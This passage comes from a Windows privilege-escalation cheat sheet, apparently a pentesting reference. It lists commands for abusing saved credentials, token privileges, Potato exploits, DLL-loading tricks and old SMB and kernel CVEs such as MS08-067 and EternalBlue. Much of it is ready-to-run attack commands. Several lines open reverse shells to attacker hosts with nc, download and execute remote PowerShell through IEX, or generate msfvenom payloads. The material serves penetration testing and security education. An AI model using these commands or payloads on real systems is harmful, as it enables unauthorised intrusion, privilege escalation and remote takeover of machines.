PS C:\Users\Swissky> DriverQuery.exe --no-msft
|
||
[+] Enumerating driver services...
|
||
[+] Checking file signatures...
|
||
Citrix USB Filter Driver
|
||
Service Name: ctxusbm
|
||
Path: C:\Windows\system32\DRIVERS\ctxusbm.sys
|
||
Version: 14.11.0.138
|
||
Creation Time (UTC): 17/05/2018 01:20:50
|
||
Cert Issuer: CN=Symantec Class 3 SHA256 Code Signing CA, OU=Symantec Trust Network, O=Symantec Corporation, C=US
|
||
Signer: CN="Citrix Systems, Inc.", OU=XenApp(ClientSHA256), O="Citrix Systems, Inc.", L=Fort Lauderdale, S=Florida, C=US
|
||
<SNIP>
|
||
```
|
||
|
||
## EoP - Runas
|
||
|
||
Use the `cmdkey` to list the stored credentials on the machine.
|
||
|
||
```powershell
|
||
cmdkey /list
|
||
Currently stored credentials:
|
||
Target: Domain:interactive=WORKGROUP\Administrator
|
||
Type: Domain Password
|
||
User: WORKGROUP\Administrator
|
||
```
|
||
|
||
Then you can use `runas` with the `/savecred` options in order to use the saved credentials.
|
||
The following example is calling a remote binary via an SMB share.
|
||
```powershell
|
||
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
|
||
```
|
||
|
||
Using `runas` with a provided set of credential.
|
||
|
||
```powershell
|
||
C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"
|
||
```
|
||
|
||
```powershell
|
||
$secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
|
||
$mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
|
||
$computer = "<hostname>"
|
||
[System.Diagnostics.Process]::Start("C:\users\public\nc.exe","<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)
|
||
```
|
||
|
||
## EoP - Abusing Shadow Copies
|
||
|
||
If you have local administrator access on a machine try to list shadow copies, it's an easy way for Privilege Escalation.
|
||
|
||
```powershell
|
||
# List shadow copies using vssadmin (Needs Admnistrator Access)
|
||
vssadmin list shadows
|
||
|
||
# List shadow copies using diskshadow
|
||
diskshadow list shadows all
|
||
|
||
# Make a symlink to the shadow copy and access it
|
||
mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
|
||
```
|
||
|
||
## EoP - From local administrator to NT SYSTEM
|
||
|
||
```powershell
|
||
PsExec.exe -i -s cmd.exe
|
||
```
|
||
|
||
## EoP - Living Off The Land Binaries and Scripts
|
||
|
||
Living Off The Land Binaries and Scripts (and also Libraries) : https://lolbas-project.github.io/
|
||
|
||
> The goal of the LOLBAS project is to document every binary, script, and library that can be used for Living Off The Land techniques.
|
||
|
||
A LOLBin/Lib/Script must:
|
||
|
||
* Be a Microsoft-signed file, either native to the OS or downloaded from Microsoft.
|
||
Have extra "unexpected" functionality. It is not interesting to document intended use cases.
|
||
Exceptions are application whitelisting bypasses
|
||
* Have functionality that would be useful to an APT or red team
|
||
|
||
```powershell
|
||
wmic.exe process call create calc
|
||
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
|
||
Microsoft.Workflow.Compiler.exe tests.xml results.xml
|
||
```
|
||
|
||
## EoP - Impersonation Privileges
|
||
|
||
Full privileges cheatsheet at https://github.com/gtworek/Priv2Admin, summary below will only list direct ways to exploit the privilege to obtain an admin session or read sensitive files.
|
||
|
||
| Privilege | Impact | Tool | Execution path | Remarks |
|
||
| --- | --- | --- | --- | --- |
|
||
|`SeAssignPrimaryToken`| ***Admin*** | 3rd party tool | *"It would allow a user to impersonate tokens and privesc to nt system using tools such as potato.exe, rottenpotato.exe and juicypotato.exe"* | Thank you [Aurélien Chalot](https://twitter.com/Defte_) for the update. I will try to re-phrase it to something more recipe-like soon. |
|
||
|`SeBackup`| **Threat** | ***Built-in commands*** | Read sensitve files with `robocopy /b` |- May be more interesting if you can read %WINDIR%\MEMORY.DMP<br> <br>- `SeBackupPrivilege` (and robocopy) is not helpful when it comes to open files.<br> <br>- Robocopy requires both SeBackup and SeRestore to work with /b parameter. |
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|`SeCreateToken`| ***Admin*** | 3rd party tool | Create arbitrary token including local admin rights with `NtCreateToken`. ||
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|`SeDebug`| ***Admin*** | **PowerShell** | Duplicate the `lsass.exe` token. | Script to be found at [FuzzySecurity](https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Conjure-LSASS.ps1) |
|
||
|`SeLoadDriver`| ***Admin*** | 3rd party tool | 1. Load buggy kernel driver such as `szkg64.sys`<br>2. Exploit the driver vulnerability<br> <br> Alternatively, the privilege may be used to unload security-related drivers with `ftlMC` builtin command. i.e.: `fltMC sysmondrv` | 1. The `szkg64` vulnerability is listed as [CVE-2018-15732](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15732)<br>2. The `szkg64` [exploit code](https://www.greyhathacker.net/?p=1025) was created by [Parvez Anwar](https://twitter.com/parvezghh) |
|
||
|`SeRestore`| ***Admin*** | **PowerShell** | 1. Launch PowerShell/ISE with the SeRestore privilege present.<br>2. Enable the privilege with [Enable-SeRestorePrivilege](https://github.com/gtworek/PSBits/blob/master/Misc/EnableSeRestorePrivilege.ps1)).<br>3. Rename utilman.exe to utilman.old<br>4. Rename cmd.exe to utilman.exe<br>5. Lock the console and press Win+U| Attack may be detected by some AV software.<br> <br>Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. |
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|`SeTakeOwnership`| ***Admin*** | ***Built-in commands*** |1. `takeown.exe /f "%windir%\system32"`<br>2. `icalcs.exe "%windir%\system32" /grant "%username%":F`<br>3. Rename cmd.exe to utilman.exe<br>4. Lock the console and press Win+U| Attack may be detected by some AV software.<br> <br>Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. |
|
||
|`SeTcb`| ***Admin*** | 3rd party tool | Manipulate tokens to have local admin rights included. May require SeImpersonate.<br> <br>To be verified. ||
|
||
|
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### Restore A Service Account's Privileges
|
||
|
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> This tool should be executed as LOCAL SERVICE or NETWORK SERVICE only.
|
||
|
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```powershell
|
||
# https://github.com/itm4n/FullPowers
|
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|
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c:\TOOLS>FullPowers
|
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[+] Started dummy thread with id 9976
|
||
[+] Successfully created scheduled task.
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[+] Got new token! Privilege count: 7
|
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[+] CreateProcessAsUser() OK
|
||
Microsoft Windows [Version 10.0.19041.84]
|
||
(c) 2019 Microsoft Corporation. All rights reserved.
|
||
|
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C:\WINDOWS\system32>whoami /priv
|
||
PRIVILEGES INFORMATION
|
||
----------------------
|
||
Privilege Name Description State
|
||
============================= ========================================= =======
|
||
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
|
||
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
|
||
SeAuditPrivilege Generate security audits Enabled
|
||
SeChangeNotifyPrivilege Bypass traverse checking Enabled
|
||
SeImpersonatePrivilege Impersonate a client after authentication Enabled
|
||
SeCreateGlobalPrivilege Create global objects Enabled
|
||
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
|
||
|
||
c:\TOOLS>FullPowers -c "C:\TOOLS\nc64.exe 1.2.3.4 1337 -e cmd" -z
|
||
```
|
||
|
||
|
||
### Meterpreter getsystem and alternatives
|
||
|
||
```powershell
|
||
meterpreter> getsystem
|
||
Tokenvator.exe getsystem cmd.exe
|
||
incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe
|
||
psexec -s -i cmd.exe
|
||
python getsystem.py # from https://github.com/sailay1996/tokenx_privEsc
|
||
```
|
||
|
||
### RottenPotato (Token Impersonation)
|
||
|
||
Binary available at : https://github.com/foxglovesec/RottenPotato
|
||
Binary available at : https://github.com/breenmachine/RottenPotatoNG
|
||
|
||
```c
|
||
getuid
|
||
getprivs
|
||
use incognito
|
||
list\_tokens -u
|
||
cd c:\temp\
|
||
execute -Hc -f ./rot.exe
|
||
impersonate\_token "NT AUTHORITY\SYSTEM"
|
||
```
|
||
|
||
```powershell
|
||
Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
|
||
Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
|
||
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
|
||
```
|
||
|
||
|
||
### Juicy Potato (abusing the golden privileges)
|
||
|
||
Binary available at : https://github.com/ohpe/juicy-potato/releases
|
||
:warning: Juicy Potato doesn't work on Windows Server 2019 and Windows 10 1809 +.
|
||
|
||
1. Check the privileges of the service account, you should look for **SeImpersonate** and/or **SeAssignPrimaryToken** (Impersonate a client after authentication)
|
||
|
||
```powershell
|
||
whoami /priv
|
||
```
|
||
|
||
2. Select a CLSID based on your Windows version, a CLSID is a globally unique identifier that identifies a COM class object
|
||
|
||
* [Windows 7 Enterprise](https://ohpe.it/juicy-potato/CLSID/Windows_7_Enterprise)
|
||
* [Windows 8.1 Enterprise](https://ohpe.it/juicy-potato/CLSID/Windows_8.1_Enterprise)
|
||
* [Windows 10 Enterprise](https://ohpe.it/juicy-potato/CLSID/Windows_10_Enterprise)
|
||
* [Windows 10 Professional](https://ohpe.it/juicy-potato/CLSID/Windows_10_Pro)
|
||
* [Windows Server 2008 R2 Enterprise](https://ohpe.it/juicy-potato/CLSID/Windows_Server_2008_R2_Enterprise)
|
||
* [Windows Server 2012 Datacenter](https://ohpe.it/juicy-potato/CLSID/Windows_Server_2012_Datacenter)
|
||
* [Windows Server 2016 Standard](https://ohpe.it/juicy-potato/CLSID/Windows_Server_2016_Standard)
|
||
|
||
3. Execute JuicyPotato to run a privileged command.
|
||
|
||
```powershell
|
||
JuicyPotato.exe -l 9999 -p c:\interpub\wwwroot\upload\nc.exe -a "IP PORT -e cmd.exe" -t t -c {B91D5831-B1BD-4608-8198-D72E155020F7}
|
||
JuicyPotato.exe -l 1340 -p C:\users\User\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
|
||
JuicyPotato.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a "/c c:\users\User\reverse_shell.exe"
|
||
Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337
|
||
......
|
||
[+] authresult 0
|
||
{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM
|
||
[+] CreateProcessWithTokenW OK
|
||
```
|
||
|
||
|
||
## EoP - Privileged File Write
|
||
|
||
### DiagHub
|
||
|
||
:warning: Starting with version 1903 and above, DiagHub can no longer be used to load arbitrary DLLs.
|
||
|
||
The Microsoft Diagnostics Hub Standard Collector Service (DiagHub) is a service that collects trace information and is programmatically exposed via DCOM.
|
||
This DCOM object can be used to load a DLL into a SYSTEM process, provided that this DLL exists in the `C:\Windows\System32` directory.
|
||
|
||
#### Exploit
|
||
|
||
1. Create an [evil DLL](https://gist.github.com/xct/3949f3f4f178b1f3427fae7686a2a9c0) e.g: payload.dll and move it into `C:\Windows\System32`
|
||
2. Build https://github.com/xct/diaghub
|
||
3. `diaghub.exe c:\\ProgramData\\ payload.dll`
|
||
|
||
The default payload will run `C:\Windows\System32\spool\drivers\color\nc.exe -lvp 2000 -e cmd.exe`
|
||
|
||
Alternative tools:
|
||
* https://github.com/Accenture/AARO-Bugs/tree/master/CVE-2020-5825/TrigDiag
|
||
* https://github.com/decoder-it/diaghub_exploit
|
||
|
||
|
||
### UsoDLLLoader
|
||
|
||
:warning: 2020-06-06 Update: this trick no longer works on the latest builds of Windows 10 Insider Preview.
|
||
|
||
> An alternative to the DiagHub DLL loading "exploit" found by James Forshaw (a.k.a. @tiraniddo)
|
||
|
||
If we found a privileged file write vulnerability in Windows or in some third-party software, we could copy our own version of `windowscoredeviceinfo.dll` into `C:\Windows\Sytem32\` and then have it loaded by the USO service to get arbitrary code execution as **NT AUTHORITY\System**.
|
||
|
||
#### Exploit
|
||
|
||
1. Build https://github.com/itm4n/UsoDllLoader
|
||
* Select Release config and x64 architecure.
|
||
* Build solution.
|
||
* DLL .\x64\Release\WindowsCoreDeviceInfo.dll
|
||
* Loader .\x64\Release\UsoDllLoader.exe.
|
||
2. Copy `WindowsCoreDeviceInfo.dll` to `C:\Windows\System32\`
|
||
3. Use the loader and wait for the shell or run `usoclient StartInteractiveScan` and connect to the bind shell on port 1337.
|
||
|
||
|
||
### WerTrigger
|
||
|
||
> Weaponizing for privileged file writes bugs with Windows problem reporting
|
||
|
||
1. Clone https://github.com/sailay1996/WerTrigger
|
||
2. Copy `phoneinfo.dll` to `C:\Windows\System32\`
|
||
3. Place `Report.wer` file and `WerTrigger.exe` in a same directory.
|
||
4. Then, run `WerTrigger.exe`.
|
||
5. Enjoy a shell as **NT AUTHORITY\SYSTEM**
|
||
|
||
|
||
## EoP - Common Vulnerabilities and Exposure
|
||
|
||
### MS08-067 (NetAPI)
|
||
|
||
Check the vulnerability with the following nmap script.
|
||
|
||
```c
|
||
nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms08-067 <ip_netblock>
|
||
```
|
||
|
||
Metasploit modules to exploit `MS08-067 NetAPI`.
|
||
|
||
```powershell
|
||
exploit/windows/smb/ms08_067_netapi
|
||
```
|
||
|
||
If you can't use Metasploit and only want a reverse shell.
|
||
|
||
```powershell
|
||
https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
|
||
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows
|
||
|
||
Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445
|
||
Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
|
||
Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal
|
||
Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English
|
||
Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)
|
||
Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)
|
||
Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)
|
||
python ms08-067.py 10.0.0.1 6 445
|
||
```
|
||
|
||
|
||
### MS10-015 (KiTrap0D) - Microsoft Windows NT/2000/2003/2008/XP/Vista/7
|
||
|
||
'KiTrap0D' User Mode to Ring Escalation (MS10-015)
|
||
|
||
```powershell
|
||
https://www.exploit-db.com/exploits/11199
|
||
|
||
Metasploit : exploit/windows/local/ms10_015_kitrap0d
|
||
```
|
||
|
||
### MS11-080 (afd.sys) - Microsoft Windows XP/2003
|
||
|
||
```powershell
|
||
Python: https://www.exploit-db.com/exploits/18176
|
||
Metasploit: exploit/windows/local/ms11_080_afdjoinleaf
|
||
```
|
||
|
||
### MS15-051 (Client Copy Image) - Microsoft Windows 2003/2008/7/8/2012
|
||
|
||
```powershell
|
||
printf("[#] usage: ms15-051 command \n");
|
||
printf("[#] eg: ms15-051 \"whoami /all\" \n");
|
||
|
||
# x32
|
||
https://github.com/rootphantomer/exp/raw/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/Win32/ms15-051.exe
|
||
|
||
# x64
|
||
https://github.com/rootphantomer/exp/raw/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/x64/ms15-051.exe
|
||
|
||
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051
|
||
use exploit/windows/local/ms15_051_client_copy_image
|
||
```
|
||
|
||
|
||
### MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
|
||
|
||
Check if the patch is installed : `wmic qfe list | findstr "3139914"`
|
||
|
||
```powershell
|
||
Powershell:
|
||
https://www.exploit-db.com/exploits/39719/
|
||
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1
|
||
|
||
Binary exe : https://github.com/Meatballs1/ms16-032
|
||
|
||
Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc
|
||
```
|
||
|
||
### MS17-010 (Eternal Blue)
|
||
|
||
Check the vulnerability with the following nmap script.
|
||
|
||
```c
|
||
nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17–010 <ip_netblock>
|
||
```
|
||
|
||
Metasploit modules to exploit `EternalRomance/EternalSynergy/EternalChampion`.
|
||
|
||
```powershell
|
||
auxiliary/admin/smb/ms17_010_command MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
|
||
auxiliary/scanner/smb/smb_ms17_010 MS17-010 SMB RCE Detection
|
||
exploit/windows/smb/ms17_010_eternalblue MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
|
||
exploit/windows/smb/ms17_010_eternalblue_win8 MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
|
||
exploit/windows/smb/ms17_010_psexec MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
|
||
```
|
||
|
||
If you can't use Metasploit and only want a reverse shell.
|
||
|
||
```powershell
|
||
git clone https://github.com/helviojunior/MS17-010
|
||
|
||
# generate a simple reverse shell to use
|
||
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o revshell.exe
|
||
python2 send_and_execute.py 10.0.0.1 revshell.exe
|
||
```
|
||
|
||
### CVE-2019-1388
|
||
|
||
Exploit : https://packetstormsecurity.com/files/14437/hhupd.exe.html
|
||
|
||
Working on :
|
||
- Windows 7
|
||
- Windows 10 LTSC 10240
|
||
|
||
Failing on :
|
||
- LTSC 2019
|
||
- 1709
|
||
- 1803
|
||
|
||
Detailed information about the vulnerability : https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege
|
||
|
||
## References
|
||
|
||
* [Windows Internals Book - 02/07/2017](https://docs.microsoft.com/en-us/sysinternals/learn/windows-internals)
|
||
* [icacls - Docs Microsoft](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls)
|
||
* [Privilege Escalation Windows - Philip Linghammar](https://xapax.gitbooks.io/security/content/privilege_escalation_windows.html)
|
||
* [Windows elevation of privileges - Guifre Ruiz](https://guif.re/windowseop)
|
||
* [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
|
||
* [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
|
||
* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
|
||
* [TOP–10 ways to boost your privileges in Windows systems - hackmag](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/)
|
||
* [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/)
|
||
* [Windows Privilege Escalation Guide - absolomb's security blog](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
|
||
* [Chapter 4 - Windows Post-Exploitation - 2 Nov 2017 - dostoevskylabs](https://github.com/dostoevskylabs/dostoevsky-pentest-notes/blob/master/chapter-4.md)
|
||
* [Remediation for Microsoft Windows Unquoted Service Path Enumeration Vulnerability - September 18th, 2016 - Robert Russell](https://www.tecklyfe.com/remediation-microsoft-windows-unquoted-service-path-enumeration-vulnerability/)
|
||
* [Pentestlab.blog - WPE-01 - Stored Credentials](https://pentestlab.blog/2017/04/19/stored-credentials/)
|
||
* [Pentestlab.blog - WPE-02 - Windows Kernel](https://pentestlab.blog/2017/04/24/windows-kernel-exploits/)
|
||
* [Pentestlab.blog - WPE-03 - DLL Injection](https://pentestlab.blog/2017/04/04/dll-injection/)
|
||
* [Pentestlab.blog - WPE-04 - Weak Service Permissions](https://pentestlab.blog/2017/03/30/weak-service-permissions/)
|
||
* [Pentestlab.blog - WPE-05 - DLL Hijacking](https://pentestlab.blog/2017/03/27/dll-hijacking/)
|
||
* [Pentestlab.blog - WPE-06 - Hot Potato](https://pentestlab.blog/2017/04/13/hot-potato/)
|
||
* [Pentestlab.blog - WPE-07 - Group Policy Preferences](https://pentestlab.blog/2017/03/20/group-policy-preferences/)
|
||
* [Pentestlab.blog - WPE-08 - Unquoted Service Path](https://pentestlab.blog/2017/03/09/unquoted-service-path/)
|
||
* [Pentestlab.blog - WPE-09 - Always Install Elevated](https://pentestlab.blog/2017/02/28/always-install-elevated/)
|
||
* [Pentestlab.blog - WPE-10 - Token Manipulation](https://pentestlab.blog/2017/04/03/token-manipulation/)
|
||
* [Pentestlab.blog - WPE-11 - Secondary Logon Handle](https://pentestlab.blog/2017/04/07/secondary-logon-handle/)
|
||
* [Pentestlab.blog - WPE-12 - Insecure Registry Permissions](https://pentestlab.blog/2017/03/31/insecure-registry-permissions/)
|
||
* [Pentestlab.blog - WPE-13 - Intel SYSRET](https://pentestlab.blog/2017/06/14/intel-sysret/)
|
||
* [Alternative methods of becoming SYSTEM - 20th November 2017 - Adam Chester @_xpn_](https://blog.xpnsec.com/becoming-system/)
|
||
* [Living Off The Land Binaries and Scripts (and now also Libraries)](https://github.com/LOLBAS-Project/LOLBAS)
|
||
* [Common Windows Misconfiguration: Services - 2018-09-23 - @am0nsec](https://amonsec.net/2018/09/23/Common-Windows-Misconfiguration-Services.html)
|
||
* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf)
|
||
* [Abusing Diaghub - xct - March 07, 2019](https://vulndev.io/howto/2019/03/07/diaghub.html)
|
||
* [Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege - James Forshaw, Project Zero - Wednesday, April 18, 2018](https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html)
|
||
* [Weaponizing Privileged File Writes with the USO Service - Part 2/2 - itm4n - August 19, 2019](https://itm4n.github.io/usodllloader-part2/) |